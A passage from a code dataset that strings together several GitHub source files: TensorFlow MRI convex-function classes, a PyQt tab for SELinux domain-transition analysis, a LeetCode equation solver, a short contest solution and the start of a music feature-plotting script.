1(3), 127-239.\n \"\"\"\n def __init__(self,\n domain_dimension,\n scale=None,\n dtype=None,\n name=None):\n super().__init__(domain_dimension=domain_dimension, order=2,\n scale=scale, dtype=dtype, name=name)\n\n\n@api_util.export(\"convex.ConvexFunctionNorm\")\nclass ConvexFunctionNorm(ConvexFunction): # pylint: disable=abstract-method\n \"\"\"A `ConvexFunction` computing the [scaled] Lp-norm of a [batch of] inputs.\n\n Args:\n domain_dimension: A scalar integer `tf.Tensor`. The dimension of the domain.\n order: A `float`. The order of the norm. Supported values are `1`, `2`,\n `np.inf`.\n scale: A `float`. A scaling factor. Defaults to 1.0.\n dtype: A `tf.dtypes.DType`. 
The type of this `ConvexFunction`. Defaults to\n `tf.dtypes.float32`.\n name: A name for this `ConvexFunction`.\n\n References:\n .. [1] Parikh, N., & Boyd, S. (2014). Proximal algorithms. Foundations and\n Trends in optimization, 1(3), 127-239.\n \"\"\"\n def __init__(self,\n domain_dimension,\n order,\n scale=None,\n dtype=None,\n name=None):\n super().__init__(scale=scale, dtype=dtype, name=name)\n self._order = check_util.validate_enum(order, [1, 2, np.inf], name='order')\n\n self._domain_dimension_static, self._domain_dimension_dynamic = (\n _get_static_and_dynamic_dimension(domain_dimension))\n\n def _call(self, x):\n return self._scale * tf.math.real(tf.norm(x, ord=self._order, axis=-1))\n\n def _prox(self, x, scale=None):\n combined_scale = self._scale\n if scale is not None:\n combined_scale *= tf.cast(scale, self.dtype.real_dtype)\n\n if self._order == 1:\n return math_ops.soft_threshold(x, combined_scale)\n if self._order == 2:\n return math_ops.block_soft_threshold(x, combined_scale)\n raise NotImplementedError(\n f\"The proximal operator of the L{self._order}-norm is not implemented.\")\n\n def _conj(self):\n # The convex conjugate of the Lp-norm is the indicator function on the unit\n # ball defined by the dual norm.\n return ConvexFunctionIndicatorBall(\n domain_dimension=self.domain_dimension,\n order=_conjugate_exponent(self._order),\n scale=self._scale,\n dtype=self.dtype,\n name=f\"{self.name}_conj\")\n\n def _shape(self):\n return tf.TensorShape([self._domain_dimension_static])\n\n def _shape_tensor(self):\n return tf.convert_to_tensor(\n [self._domain_dimension_dynamic], dtype=tf.int32)\n\n\n@api_util.export(\"convex.ConvexFunctionL1Norm\")\nclass ConvexFunctionL1Norm(ConvexFunctionNorm): # pylint: disable=abstract-method\n \"\"\"A `ConvexFunction` computing the [scaled] L1-norm of a [batch of] inputs.\n\n Args:\n domain_dimension: A scalar integer `tf.Tensor`. The dimension of the domain.\n scale: A `float`. A scaling factor. Defaults to 1.0.\n dtype: A `tf.dtypes.DType`. The type of this `ConvexFunction`. Defaults to\n `tf.dtypes.float32`.\n name: A name for this `ConvexFunction`.\n\n References:\n .. [1] Parikh, N., & Boyd, S. (2014). Proximal algorithms. Foundations and\n Trends in optimization, 1(3), 127-239.\n \"\"\"\n def __init__(self,\n domain_dimension,\n scale=None,\n dtype=None,\n name=None):\n super().__init__(domain_dimension=domain_dimension, order=1,\n scale=scale, dtype=dtype, name=name)\n\n\n@api_util.export(\"convex.ConvexFunctionL2Norm\")\nclass ConvexFunctionL2Norm(ConvexFunctionNorm): # pylint: disable=abstract-method\n \"\"\"A `ConvexFunction` computing the [scaled] L2-norm of a [batch of] inputs.\n\n Args:\n domain_dimension: A scalar integer `tf.Tensor`. The dimension of the domain.\n scale: A `float`. A scaling factor. Defaults to 1.0.\n dtype: A `string` or `DType`. The type of this `ConvexFunction`. Defaults to\n `tf.dtypes.float32`.\n name: A name for this `ConvexFunction`.\n\n References:\n .. [1] Parikh, N., & Boyd, S. (2014). Proximal algorithms. 
Foundations and\n Trends in optimization, 1(3), 127-239.\n \"\"\"\n def __init__(self,\n domain_dimension,\n scale=None,\n dtype=None,\n name=None):\n super().__init__(domain_dimension=domain_dimension, order=2,\n scale=scale, dtype=dtype, name=name)\n\n\n@api_util.export(\"convex.ConvexFunctionL2NormSquared\")\nclass ConvexFunctionL2NormSquared(ConvexFunction): # pylint: disable=abstract-method\n \"\"\"A `ConvexFunction` computing the [scaled] squared L2-norm of an input.\n\n Args:\n domain_dimension: A scalar integer `tf.Tensor`. The dimension of the domain.\n scale: A `float`. A scaling factor. Defaults to 1.0.\n dtype: A `string` or `DType`. The type of this `ConvexFunction`. Defaults to\n `tf.dtypes.float32`.\n name: A name for this `ConvexFunction`.\n\n References:\n .. [1] Parikh, N., & Boyd, S. (2014). Proximal algorithms. Foundations and\n Trends in optimization, 1(3), 127-239.\n \"\"\"\n def __init__(self,\n domain_dimension,\n scale=None,\n dtype=None,\n name=None):\n super().__init__(domain_dimension=domain_dimension,\n scale=scale, dtype=dtype, name=name)\n\n def _call(self, x):\n return self._scale * tf.math.reduce_sum(x * tf.math.conj(x), axis=-1)\n\n def _prox(self, x, scale=None):\n combined_scale = self._scale\n if scale is not None:\n combined_scale *= tf.cast(scale, self.dtype.real_dtype)\n\n return math_ops.shrinkage(x, 2.0 * combined_scale)\n\n\n@api_util.export(\"convex.ConvexFunctionTikhonov\")\nclass ConvexFunctionTikhonov(ConvexFunctionAffineMappingComposition): # pylint: disable=abstract-method\n r\"\"\"A `ConvexFunction` representing a Tikhonov regularization term.\n\n For a given input :math:`x`, computes\n :math:`\\lambda \\left\\| T(x - x_0) \\right\\|_2^2`, where :math:`\\lambda` is a\n scaling factor, :math:`T` is any linear operator and :math:`x_0` is\n a prior estimate.\n\n Args:\n transform: A `tf.linalg.LinearOperator`. The Tikhonov operator :math:`T`.\n Defaults to the identity operator.\n prior: A `tf.Tensor`. The prior estimate :math:`x_0`. Defaults to 0.\n domain_dimension: A scalar integer `tf.Tensor`. The dimension of the domain.\n scale: A `float`. The scaling factor.\n dtype: A `tf.DType`. The dtype of the inputs. Defaults to `float32`.\n name: A name for this `ConvexFunction`.\n \"\"\"\n def __init__(self,\n transform=None,\n prior=None,\n domain_dimension=None,\n scale=None,\n dtype=tf.float32,\n name=None):\n if domain_dimension is None and transform is not None:\n domain_dimension = transform.range_dimension\n function = ConvexFunctionL2NormSquared(domain_dimension=domain_dimension,\n scale=scale,\n dtype=dtype)\n # Stored only for external access. 
Not actually used for computation.\n self._transform = transform\n self._prior = prior\n # Convert to affine transform.\n operator = self._transform\n constant = self._prior\n if self._prior is not None:\n constant = tf.math.negative(constant)\n if operator is not None:\n constant = tf.linalg.matvec(operator, constant)\n super().__init__(function,\n operator=operator,\n constant=constant,\n name=name)\n\n @property\n def transform(self):\n return self._transform\n\n @property\n def prior(self):\n return self._prior\n\n\n@api_util.export(\"convex.ConvexFunctionTotalVariation\")\nclass ConvexFunctionTotalVariation(ConvexFunctionLinearOperatorComposition): # pylint: disable=abstract-method\n r\"\"\"A `ConvexFunction` representing a total variation regularization term.\n\n For a given input :math:`x`, computes :math:`\\lambda \\left\\| Dx \\right\\|_1`,\n where :math:`\\lambda` is a scaling factor and :math:`D` is the finite\n difference operator.\n\n Args:\n domain_shape: A 1D integer `tf.Tensor`. The shape of the domain. Defaults to\n `None`. The domain of this `ConvexFunction` may have multiple axes.\n axes: An `int` or a list of `ints`. The axes along which to compute the\n total variation. If `None` (default), the total variation is computed\n over all axes.\n scale: A `float`. A scaling factor.\n dtype: A `tf.DType`. The dtype of the inputs.\n name: A name for this `ConvexFunction`.\n \"\"\"\n def __init__(self,\n domain_shape,\n axes=None,\n scale=None,\n dtype=tf.float32,\n name=None):\n domain_shape_static, _ = (\n tensor_util.static_and_dynamic_shapes_from_shape(domain_shape))\n if axes is None:\n if domain_shape_static.rank is None:\n raise NotImplementedError(\n \"Rank of domain_shape must be known statically\")\n axes = list(range(domain_shape_static.rank))\n if isinstance(axes, int):\n axes = [axes]\n # `LinearOperatorFiniteDifference` operates along one axis only. So for\n # multiple axes, we create one operator for each axis and vertically stack\n # them.\n operators = [linalg_ops.LinearOperatorFiniteDifference(\n domain_shape, axis=axis, dtype=dtype) for axis in axes]\n operator = linalg_ext.LinearOperatorVerticalStack(operators)\n function = ConvexFunctionL1Norm(\n domain_dimension=operator.range_dimension_tensor(),\n scale=scale,\n dtype=dtype)\n super().__init__(function,\n operator=operator,\n name=name)\n\n\n@api_util.export(\"convex.ConvexFunctionL1Wavelet\")\nclass ConvexFunctionL1Wavelet(ConvexFunctionLinearOperatorComposition): # pylint: disable=abstract-method\n r\"\"\"A `ConvexFunction` representing an L1 wavelet regularization term.\n\n For a given input :math:`x`, computes :math:`\\lambda \\left\\| Dx \\right\\|_1`,\n where :math:`\\lambda` is a scaling factor and :math:`D` is a wavelet\n decomposition operator (see `tfmri.linalg.LinearOperatorWavelet`).\n\n Args:\n domain_shape: A 1D integer `tf.Tensor`. The domain shape of this linear\n operator. This operator may have multiple domain dimensions.\n wavelet: A `str` or a `pywt.Wavelet`_, or a `list` thereof. When passed a\n `list`, different wavelets are applied along each axis in `axes`.\n mode: A `str`. The padding or signal extension mode. Must be one of the\n values supported by `tfmri.signal.wavedec`. Defaults to `'symmetric'`.\n level: An `int` >= 0. The decomposition level. If `None` (default),\n the maximum useful level of decomposition will be used (see\n `tfmri.signal.max_wavelet_level`).\n axes: A `list` of `int`. The axes over which the DWT is computed. 
Axes refer\n only to domain dimensions without regard for the batch dimensions.\n Defaults to `None` (all domain dimensions).\n scale: A `float`. A scaling factor.\n dtype: A `tf.dtypes.DType`. The dtype of the inputs.\n name: A name for this `ConvexFunction`.\n \"\"\"\n def __init__(self,\n domain_shape,\n wavelet,\n mode='symmetric',\n level=None,\n axes=None,\n scale=None,\n dtype=tf.dtypes.float32,\n name=None):\n operator = linalg_ops.LinearOperatorWavelet(domain_shape,\n wavelet,\n mode=mode,\n level=level,\n axes=axes,\n dtype=dtype)\n function = ConvexFunctionL1Norm(\n domain_dimension=operator.range_dimension_tensor(),\n scale=scale,\n dtype=dtype)\n super().__init__(function, operator, name=name)\n\n def _shape(self):\n return tf.TensorShape([self.operator.shape[-1]])\n\n def _shape_tensor(self):\n return tf.convert_to_tensor(\n [self.operator.shape_tensor()[-1]], dtype=tf.int32)\n\n\n@api_util.export(\"convex.ConvexFunctionQuadratic\")\nclass ConvexFunctionQuadratic(ConvexFunction): # pylint: disable=abstract-method\n r\"\"\"A `ConvexFunction` representing a generic quadratic function.\n\n Represents :math:`f(x) = \\frac{1}{2} x^{T} A x + b^{T} x + c`.\n\n Args:\n quadratic_coefficient: A `tf.Tensor` or a `tf.linalg.LinearOperator`\n representing a self-adjoint, positive definite matrix `A` with shape\n `[..., n, n]`. The coefficient of the quadratic term.\n linear_coefficient: A `tf.Tensor` representing a vector `b` with shape\n `[..., n]`. The coefficient of the linear term.\n constant_coefficient: A scalar `tf.Tensor` representing the constant term\n `c` with shape `[...]`.\n scale: A `float`. A scaling factor. Defaults to 1.0.\n name: A name for this `ConvexFunction`.\n \"\"\"\n def __init__(self,\n quadratic_coefficient,\n linear_coefficient=None,\n constant_coefficient=None,\n scale=None,\n name=None):\n super().__init__(domain_dimension=quadratic_coefficient.shape[-1],\n scale=scale,\n dtype=quadratic_coefficient.dtype,\n name=name)\n self._quadratic_coefficient = quadratic_coefficient\n self._linear_coefficient = self._validate_linear_coefficient(\n linear_coefficient)\n self._constant_coefficient = self._validate_constant_coefficient(\n constant_coefficient)\n\n def _call(self, x):\n # Calculate the quadratic term.\n result = 0.5 * _dot(\n x, tf.linalg.matvec(self._quadratic_coefficient, x))\n # Add the linear term, if there is one.\n if self._linear_coefficient is not None:\n result += _dot(self._linear_coefficient, x)\n # Add the constant term, if there is one.\n if self._constant_coefficient is not None:\n result += self._constant_coefficient\n return self._scale * result\n\n def _prox(self, x, scale=None, solver_kwargs=None): # pylint: disable=arguments-differ\n combined_scale = self._scale\n if scale is not None:\n combined_scale *= tf.cast(scale, self.dtype.real_dtype)\n one_over_scale = tf.cast(1.0 / combined_scale, self.dtype)\n\n # Operator A^T A + 1 / \\lambda * I.\n self._operator = linalg_ext.LinearOperatorAddition([\n self._quadratic_coefficient,\n tf.linalg.LinearOperatorScaledIdentity(\n num_rows=self._quadratic_coefficient.domain_dimension,\n multiplier=one_over_scale)],\n is_self_adjoint=True,\n is_positive_definite=True)\n\n rhs = one_over_scale * x\n if self._linear_coefficient is not None:\n rhs -= self._linear_coefficient\n\n solver_kwargs = solver_kwargs or {}\n state = linalg_ops.conjugate_gradient(self._operator, rhs, **solver_kwargs)\n\n return state.x\n\n def _validate_linear_coefficient(self, coef): # pylint: disable=missing-param-doc\n 
\"\"\"Validates the linear coefficient.\"\"\"\n if coef.shape.rank is None:\n raise ValueError(\n \"Expected linear coefficient to have known rank, but found: %s in \"\n \"tensor %s\" % (coef.shape.rank, coef))\n if coef.shape.rank < 1:\n raise ValueError(\n \"Expected linear coefficient to have rank >= 1, but found: %s in \"\n \"tensor %s\" % (coef.shape.rank, coef))\n if not coef.shape[-1:].is_compatible_with([self._domain_dimension]):\n raise ValueError(\n \"Expected linear coefficient to have last dimension %d, but found: \"\n \"%d in tensor %s\" % (self._domain_dimension, coef.shape[-1], coef))\n if coef.dtype != self.dtype:\n raise ValueError(\n \"Expected linear coefficient to have dtype %s, but found: %s in \"\n \"tensor %s\" % (self.dtype, coef.dtype, coef))\n return coef\n\n def _validate_constant_coefficient(self, coef): # pylint: disable=missing-param-doc\n \"\"\"Validates the constant coefficient.\"\"\"\n if coef.dtype != self.dtype:\n raise ValueError(\n \"Expected constant coefficient to have dtype %s, but found: %s in \"\n \"tensor %s\" % (self.dtype, coef.dtype, coef))\n return coef\n\n def _shape(self):\n \"\"\"Returns the static shape of this `ConvexFunction`.\"\"\"\n batch_shape = array_ops.broadcast_static_shapes(\n self._quadratic_coefficient.shape[:-2],\n self._linear_coefficient.shape[:-1],\n self._constant_coefficient.shape)\n return batch_shape.concatenate(tf.TensorShape([self._domain_dimension]))\n\n def _shape_tensor(self):\n \"\"\"Returns the dynamic shape of this `ConvexFunction`.\"\"\"\n batch_shape_tensor = array_ops.broadcast_dynamic_shapes(\n tensor_util.object_shape(self._quadratic_coefficient)[:-2],\n tf.shape(self._linear_coefficient)[:-1],\n tf.shape(self._constant_coefficient))\n return tf.concat([batch_shape_tensor, [self._domain_dimension]], 0)\n\n @property\n def quadratic_coefficient(self):\n return self._quadratic_coefficient\n\n @property\n def linear_coefficient(self):\n return self._linear_coefficient\n\n @property\n def constant_coefficient(self):\n return self._constant_coefficient\n\n\n@api_util.export(\"convex.ConvexFunctionLeastSquares\")\nclass ConvexFunctionLeastSquares(ConvexFunctionQuadratic): # pylint: disable=abstract-method\n r\"\"\"A `ConvexFunction` representing a least squares function.\n\n Represents :math:`f(x) = \\frac{1}{2} {\\left \\| A x - b \\right \\|}_{2}^{2}`.\n\n Minimizing `f(x)` is equivalent to finding a solution to the linear system\n :math:`Ax - b`.\n\n Args:\n operator: A `tf.Tensor` or a `tfmri.linalg.LinearOperator` representing a\n matrix :math:`A` with shape `[..., m, n]`. The linear system operator.\n rhs: A `Tensor` representing a vector `b` with shape `[..., m]`. The\n right-hand side of the linear system.\n gram_operator: A `tf.Tensor` or a `tfmri.linalg.LinearOperator` representing\n the Gram matrix of `operator`. This may be used to provide a specialized\n implementation of the Gram matrix :math:`A^H A`. Defaults to `None`, in\n which case a naive implementation of the Gram matrix is derived from\n `operator`.\n scale: A `float`. A scaling factor. 
Defaults to 1.0.\n name: A name for this `ConvexFunction`.\n \"\"\"\n def __init__(self, operator, rhs, gram_operator=None, scale=None, name=None):\n if isinstance(operator, linalg_imaging.LinalgImagingMixin):\n rhs = operator.flatten_range_shape(rhs)\n if gram_operator:\n quadratic_coefficient = gram_operator\n else:\n quadratic_coefficient = tf.linalg.LinearOperatorComposition(\n [operator.H, operator],\n is_self_adjoint=True, is_positive_definite=True)\n linear_coefficient = tf.math.negative(\n tf.linalg.matvec(operator, rhs, adjoint_a=True))\n constant_coefficient = tf.constant(0.0, dtype=operator.dtype)\n super().__init__(quadratic_coefficient=quadratic_coefficient,\n linear_coefficient=linear_coefficient,\n constant_coefficient=constant_coefficient,\n scale=scale,\n name=name)\n\n @property\n def operator(self):\n return self.quadratic_coefficient\n\n @property\n def rhs(self):\n return tf.math.negative(self.linear_coefficient)\n\n\ndef _dot(x, y):\n \"\"\"Returns the dot product of `x` and `y`.\"\"\"\n return tf.squeeze(\n tf.linalg.matvec(\n x[..., tf.newaxis],\n y, adjoint_a=True), axis=-1)\n\n\ndef _conjugate_exponent(exp):\n \"\"\"Returns the conjugate exponent of `exp`.\"\"\"\n if exp == 1.0:\n return np.inf\n if exp == np.inf:\n return 1.0\n return exp / (exp - 1.0)\n\n\ndef _get_static_and_dynamic_dimension(dim): # pylint: disable=missing-param-doc\n \"\"\"Returns the static and dynamic information from `dim`.\"\"\"\n # Get static dimension.\n dim_static = tf.get_static_value(dim)\n if dim_static is not None:\n if isinstance(dim_static, np.ndarray):\n try:\n dim_static = dim_static.item()\n except ValueError as err:\n raise ValueError(\n f\"domain_dimension must be a scalar integer, \"\n f\"but got: {dim_static} (type: {type(dim_static)})\") from err\n if isinstance(dim_static, (np.int32, np.int64)):\n dim_static = dim_static.item()\n if isinstance(dim_static, tf.compat.v1.Dimension):\n dim_static = dim_static.value\n if not isinstance(dim_static, int):\n raise ValueError(\n f\"domain_dimension must be a scalar integer, \"\n f\"but got: {dim_static} (type: {type(dim_static)})\")\n\n # Get dynamic dimension.\n dim_dynamic = tf.convert_to_tensor(dim, dtype=tf.int32)\n if dim_dynamic.shape.rank != 0:\n raise ValueError(\n f\"domain_dimension must be a scalar integer, \"\n f\"but got: {dim_dynamic} (type: {type(dim_dynamic)})\")\n\n return dim_static, dim_dynamic\n","repo_name":"mrphys/tensorflow-mri","sub_path":"tensorflow_mri/python/ops/convex_ops.py","file_name":"convex_ops.py","file_ext":"py","file_size_in_byte":35986,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"3"} +{"seq_id":"19204997403","text":"import logging\n\nfrom PyQt5.QtCore import pyqtSignal, Qt, QObject, QStringListModel, QThread\nfrom PyQt5.QtGui import QPalette, QTextCursor\nfrom PyQt5.QtWidgets import QCompleter, QHeaderView, QMessageBox, QProgressDialog, QScrollArea\nfrom setools import DomainTransitionAnalysis\n\nfrom .excludetypes import ExcludeTypes\nfrom ..widget import SEToolsWidget\n\n\nclass DomainTransitionAnalysisTab(SEToolsWidget, QScrollArea):\n\n \"\"\"A domain transition analysis tab.\"\"\"\n\n def __init__(self, parent, policy, perm_map):\n super(DomainTransitionAnalysisTab, self).__init__(parent)\n self.log = logging.getLogger(self.__class__.__name__)\n self.policy = policy\n self.query = DomainTransitionAnalysis(policy)\n self.setupUi()\n\n def __del__(self):\n self.thread.quit()\n self.thread.wait(5000)\n\n def setupUi(self):\n 
self.log.debug(\"Initializing UI.\")\n self.load_ui(\"dta.ui\")\n\n # set up source/target autocompletion\n type_completion_list = [str(t) for t in self.policy.types()]\n type_completer_model = QStringListModel(self)\n type_completer_model.setStringList(sorted(type_completion_list))\n self.type_completion = QCompleter()\n self.type_completion.setModel(type_completer_model)\n self.source.setCompleter(self.type_completion)\n self.target.setCompleter(self.type_completion)\n\n # setup indications of errors on source/target/default\n self.orig_palette = self.source.palette()\n self.error_palette = self.source.palette()\n self.error_palette.setColor(QPalette.Base, Qt.red)\n self.clear_source_error()\n self.clear_target_error()\n\n # set up processing thread\n self.thread = QThread()\n self.worker = ResultsUpdater(self.query)\n self.worker.moveToThread(self.thread)\n self.worker.raw_line.connect(self.raw_results.appendPlainText)\n self.worker.finished.connect(self.thread.quit)\n self.thread.started.connect(self.worker.update)\n self.thread.finished.connect(self.update_complete)\n\n # create a \"busy, please wait\" dialog\n self.busy = QProgressDialog(self)\n self.busy.setModal(True)\n self.busy.setLabelText(\"Processing analysis...\")\n self.busy.setRange(0, 0)\n self.busy.setMinimumDuration(0)\n self.busy.canceled.connect(self.thread.requestInterruption)\n\n # Ensure settings are consistent with the initial .ui state\n self.max_path_length.setEnabled(self.all_paths.isChecked())\n self.source.setEnabled(not self.flows_in.isChecked())\n self.target.setEnabled(not self.flows_out.isChecked())\n self.criteria_frame.setHidden(not self.criteria_expander.isChecked())\n self.results_frame.setHidden(not self.results_expander.isChecked())\n self.notes.setHidden(not self.notes_expander.isChecked())\n\n # connect signals\n self.buttonBox.clicked.connect(self.run)\n self.source.textEdited.connect(self.clear_source_error)\n self.source.editingFinished.connect(self.set_source)\n self.target.textEdited.connect(self.clear_target_error)\n self.target.editingFinished.connect(self.set_target)\n self.all_paths.toggled.connect(self.all_paths_toggled)\n self.flows_in.toggled.connect(self.flows_in_toggled)\n self.flows_out.toggled.connect(self.flows_out_toggled)\n self.reverse.stateChanged.connect(self.reverse_toggled)\n self.exclude_types.clicked.connect(self.choose_excluded_types)\n\n #\n # Analysis mode\n #\n def all_paths_toggled(self, value):\n self.max_path_length.setEnabled(value)\n\n def flows_in_toggled(self, value):\n self.source.setEnabled(not value)\n self.reverse.setEnabled(not value)\n\n if value:\n self.reverse_old = self.reverse.isChecked()\n self.reverse.setChecked(True)\n else:\n self.reverse.setChecked(self.reverse_old)\n\n def flows_out_toggled(self, value):\n self.target.setEnabled(not value)\n self.reverse.setEnabled(not value)\n\n if value:\n self.reverse_old = self.reverse.isChecked()\n self.reverse.setChecked(False)\n else:\n self.reverse.setChecked(self.reverse_old)\n\n #\n # Source criteria\n #\n\n def clear_source_error(self):\n self.source.setToolTip(\"The source domain of the analysis.\")\n self.source.setPalette(self.orig_palette)\n\n def set_source(self):\n try:\n # look up the type here, so invalid types can be caught immediately\n text = self.source.text()\n if text:\n self.query.source = self.policy.lookup_type(text)\n else:\n self.query.source = None\n except Exception as ex:\n self.source.setToolTip(\"Error: \" + str(ex))\n self.source.setPalette(self.error_palette)\n\n #\n # Target 
criteria\n #\n\n def clear_target_error(self):\n self.target.setToolTip(\"The target domain of the analysis.\")\n self.target.setPalette(self.orig_palette)\n\n def set_target(self):\n try:\n # look up the type here, so invalid types can be caught immediately\n text = self.target.text()\n if text:\n self.query.target = self.policy.lookup_type(text)\n else:\n self.query.target = None\n except Exception as ex:\n self.target.setToolTip(\"Error: \" + str(ex))\n self.target.setPalette(self.error_palette)\n\n #\n # Options\n #\n def choose_excluded_types(self):\n chooser = ExcludeTypes(self, self.policy)\n chooser.show()\n\n def reverse_toggled(self, value):\n self.query.reverse = value\n\n #\n # Results runner\n #\n\n def run(self, button):\n # right now there is only one button.\n for mode in [self.all_paths, self.all_shortest_paths, self.flows_in, self.flows_out]:\n if mode.isChecked():\n break\n\n self.query.mode = mode.objectName()\n self.query.max_path_len = self.max_path_length.value()\n self.query.limit = self.limit_paths.value()\n\n # start processing\n self.busy.show()\n self.raw_results.clear()\n self.thread.start()\n\n def update_complete(self):\n # update location of result display\n self.raw_results.moveCursor(QTextCursor.Start)\n\n self.busy.reset()\n\n\nclass ResultsUpdater(QObject):\n\n \"\"\"\n Thread for processing queries and updating result widgets.\n\n Parameters:\n query The query object\n model The model for the results\n\n Qt signals:\n finished The update has completed.\n raw_line (str) A string to be appended to the raw results.\n \"\"\"\n\n finished = pyqtSignal()\n raw_line = pyqtSignal(str)\n\n def __init__(self, query):\n super(ResultsUpdater, self).__init__()\n self.query = query\n\n def update(self):\n \"\"\"Run the query and update results.\"\"\"\n\n assert self.query.limit, \"Code doesn't currently handle unlimited (limit=0) paths.\"\n if self.query.mode == \"all_paths\":\n self.transitive(self.query.all_paths(self.query.source, self.query.target,\n self.query.max_path_len))\n elif self.query.mode == \"all_shortest_paths\":\n self.transitive(self.query.all_shortest_paths(self.query.source, self.query.target))\n elif self.query.mode == \"flows_out\":\n self.direct(self.query.transitions(self.query.source))\n else: # flows_in\n self.direct(self.query.transitions(self.query.target))\n\n self.finished.emit()\n\n def print_transition(self, trans):\n \"\"\"Raw rendering of a domain transition.\"\"\"\n\n if trans.transition:\n self.raw_line.emit(\"Domain transition rule(s):\")\n for t in trans.transition:\n self.raw_line.emit(str(t))\n\n if trans.setexec:\n self.raw_line.emit(\"\\nSet execution context rule(s):\")\n for s in trans.setexec:\n self.raw_line.emit(str(s))\n\n for entrypoint in trans.entrypoints:\n self.raw_line.emit(\"\\nEntrypoint {0}:\".format(entrypoint.name))\n\n self.raw_line.emit(\"\\tDomain entrypoint rule(s):\")\n for e in entrypoint.entrypoint:\n self.raw_line.emit(\"\\t{0}\".format(e))\n\n self.raw_line.emit(\"\\n\\tFile execute rule(s):\")\n for e in entrypoint.execute:\n self.raw_line.emit(\"\\t{0}\".format(e))\n\n if entrypoint.type_transition:\n self.raw_line.emit(\"\\n\\tType transition rule(s):\")\n for t in entrypoint.type_transition:\n self.raw_line.emit(\"\\t{0}\".format(t))\n\n self.raw_line.emit(\"\")\n\n if trans.dyntransition:\n self.raw_line.emit(\"Dynamic transition rule(s):\")\n for d in trans.dyntransition:\n self.raw_line.emit(str(d))\n\n self.raw_line.emit(\"\\nSet current process context rule(s):\")\n for s in 
trans.setcurrent:\n                self.raw_line.emit(str(s))\n\n            self.raw_line.emit(\"\")\n\n        self.raw_line.emit(\"\")\n\n    def transitive(self, paths):\n        i = 0\n        for i, path in enumerate(paths, start=1):\n            self.raw_line.emit(\"Domain transition path {0}:\".format(i))\n\n            for stepnum, step in enumerate(path, start=1):\n\n                self.raw_line.emit(\"Step {0}: {1} -> {2}\\n\".format(stepnum, step.source,\n                                                                   step.target))\n                self.print_transition(step)\n\n            if QThread.currentThread().isInterruptionRequested() or (i >= self.query.limit):\n                break\n            else:\n                QThread.yieldCurrentThread()\n\n        self.raw_line.emit(\"{0} domain transition path(s) found.\".format(i))\n\n    def direct(self, transitions):\n        i = 0\n        for i, step in enumerate(transitions, start=1):\n            self.raw_line.emit(\"Transition {0}: {1} -> {2}\\n\".format(i, step.source, step.target))\n            self.print_transition(step)\n\n            if QThread.currentThread().isInterruptionRequested() or (i >= self.query.limit):\n                break\n            else:\n                QThread.yieldCurrentThread()\n\n        self.raw_line.emit(\"{0} domain transition(s) found.\".format(i))\n","repo_name":"robcore/sedump","sub_path":"setoolsgui/apol/dta.py","file_name":"dta.py","file_ext":"py","file_size_in_byte":10503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"27019872425","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/1/30 12:06\n# @Author : Xingjh\n# @Email : xjh_0125@sina.com\n# @File : solve_equation.py\n# @Software: PyCharm\n\nimport re\nimport math\n\n\nclass Solution:\n    def solveEquation(self, equation):\n        \"\"\"\n        Solve a given equation and return x as a string \"x=#value\". The equation contains only '+', '-' operations, the variable x and its corresponding coefficients.\n\nIf the equation has no solution, return \"No solution\".\n\nIf the equation has infinite solutions, return \"Infinite solutions\".\n\nIf there is exactly one solution, it is guaranteed that the returned value x is an integer.\n        :type equation: str\n        :rtype: str\n        \"\"\"\n        result = ''\n        li = equation.split('=')\n        li_left = li[0]\n        li_right = li[1]\n        x_patt = re.compile('([+|-]*[\\\d]*)x')\n        d_patt = re.compile('([+|-]*[\\\d]+)')\n        x_left = x_patt.findall(li_left)\n        tmp = re.sub(x_patt, '', li_left)\n        d_left = d_patt.findall(tmp)\n        # print(tmp, li_left, equation)\n        x_right = x_patt.findall(li_right)\n        tmp = re.sub(x_patt, '', li_right)\n        d_right = d_patt.findall(tmp)\n        # print(x_left, x_right, d_left, d_right, equation)\n        # print(x_left, self.change(x_left), self.sum(self.change(x_left)))\n        # print(x_right, self.change(x_right), self.sum(self.change(x_right)))\n        # print(d_left, self.change(d_left), self.sum(self.change(d_left)))\n        # print(d_right, self.change(d_right), self.sum(self.change(d_right)))\n        x_total = self.sum(self.change(x_left)) - self.sum(self.change(x_right))\n        d_total = self.sum(self.change(d_right)) - self.sum(self.change(d_left))\n        # print(x_total, d_total, equation)\n        if x_total == 0:\n            if d_total == 0:\n                result = 'Infinite solutions'\n            else:\n                result = 'No solution'\n        else:\n            if d_total == 0:\n                result = 'x=0'\n            else:\n                result = 'x=' + str(round(d_total / x_total))\n        print(equation)\n        return result\n\n    def change(self, li):\n        result = []\n        for i in li:\n            if i == '' or i == '+':\n                i = 1\n            elif i == '-':\n                i = -1\n            result.append(int(i))\n        return result\n\n    def sum(self, li):\n        result = 0\n        for i in li:\n            result += i\n        return result\n\n    def test(self):\n        print(self.solveEquation('1+x+5+2x-4-3x+5-6=4x+3x+5'))\n        print(self.solveEquation('x+5-3+x=6+x-2'))\n        print(self.solveEquation('x=x'))\n        print(self.solveEquation('2x=x'))\n        print(self.solveEquation('x=x+2'))\n\n\nif __name__ == '__main__':\n    s = Solution()\n    
s.test()\n","repo_name":"xjh1230/py_algorithm","sub_path":"test/solve_equation.py","file_name":"solve_equation.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"42291489403","text":"from math import sqrt\n\nn=int(input())\ns=int(sqrt(n))\n\ntemp=1\nfor i in range(2,s+1):\n    if n%i==0:\n        temp=n//i\n        break\n\nif temp>=n-1:\n    print(n-1)\nelse:\n    print(n-temp)\n","repo_name":"Shovon588/Programming","sub_path":"Team Forming Contest/IUPC/TFC 1/I - Frane's Function.py","file_name":"I - Frane's Function.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"41539349178","text":"#! /usr/bin/env python\n#-*- coding: utf-8 -*-\n\n\"\"\" Plot of features extracted from music tracks \"\"\"\n\nimport sys\nimport numpy as np\nimport librosa\nimport librosa.display\nimport matplotlib.pyplot as plt\nimport matplotlib.style as ms\nms.use('seaborn-muted')\n\n# my module\nsys.path.append('../feature_extraction/')\nimport feature_extraction\n\n# constant value\nSAMPLING_RATE = 44100  # Hz\nWINDOW = 0.2  # sec\nSHIFT = 0.1  # sec\nN_FFT = 